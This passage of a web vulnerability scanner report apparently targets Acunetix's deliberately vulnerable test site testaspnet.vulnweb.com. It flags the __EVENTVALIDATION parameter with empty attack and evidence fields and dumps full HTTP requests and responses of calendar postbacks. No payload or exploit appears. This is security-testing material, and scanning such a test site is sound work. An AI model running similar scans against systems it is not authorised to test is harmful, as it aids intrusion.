who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8261&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAZe6HfdoIZGRkhoknL7pghjVL7H%2FpzY6FjYqxjxk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKW0qW2BQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DEv%2FuSZSD%2FAofi0oluIq83JE2EoI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:17:51 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAZe6HfdoIZGRkhoknL7pghjVL7H/pzY6FjYqxjxk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKW0qW2BQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DEv/uSZSD/Aofi0oluIq83JE2EoI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:White" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8186&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAaYGYQtoIZGRk%2FyT2CRqgE%2BFRE6BpjyuoL72OL5A%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKw1ZueBgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2FascmpdpAjioUsoCzVg6FOfJXFVg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:47:20 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAaYGYQtoIZGRk/yT2CRqgE+FRE6BpjyuoL72OL5A=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKw1ZueBgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w/ascmpdpAjioUsoCzVg6FOfJXFVg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:White" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by 